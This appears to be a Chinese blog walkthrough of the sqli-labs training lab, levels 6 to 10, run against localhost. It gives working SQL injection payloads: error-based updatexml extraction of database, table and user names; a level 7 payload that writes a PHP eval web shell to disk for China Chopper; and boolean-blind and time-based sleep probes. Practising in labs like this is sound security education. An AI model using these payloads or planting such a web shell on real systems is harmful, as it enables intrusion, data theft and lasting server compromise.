主页有sqli-labs靶场通关攻略 1-5
第六关 less-6
步骤一:根据联合查询发现没有回显数据,输出仍然You are in.........
步骤二:输入?id=1"发现报错
步骤三:输入?id=1" --+完成闭合
步骤四:利用 and updatexml搜索数据库
http://127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select database())),1) --+
步骤五:查询表明
结果超过一行,利用group_concat组成一个集合
http://127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
步骤七:.查具体的username和password
http://127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+//第一条的username
http://127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select username from users limit 1,1)),1)--+ //第二条的username
http://127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select username from users limit 2,1)),1)--+ //第三条的username
第七关 less-7
步骤一:判断注入方式 ?id=1'))
闭合方式--+
步骤二:输入一句话话木马
http://127.0.0.1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "D:\\phpstudy_pro\\WWW\\lsz.php"--+
网址后输入.lsz.php查看
步骤三 利用中国菜刀工具进行连接
第八关 less-8
步骤一:判断注入方式,闭合方式?id=1' --+
步骤二:查询数据库 利用burpsutie抓包
http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))=1%20--+
发送到intruder
最终得出数据库名security
第九题 less-9
步骤一:判断闭合方式 ?id=1' --+
步骤二:判断长度http://127.0.0.1/Less-9/?id=1%27%20and%20if(length(database())%3E10,sleep(2),0)%20--+
判断得出为8
步骤三 得出数据库
http://127.0.0.1/Less-9/?id=1%27%20and%20if((ascii(substr(database(),2,1))%3E97),sleep(2),0)%20--+
经过数次尝试得出数据库名security
第十关 less-10
步骤一:判断闭合方式 ?id=1" --+
标签:10,127.0,http,Less,0.1,labs,sqli,--+,id From: https://blog.csdn.net/2301_82061181/article/details/141230696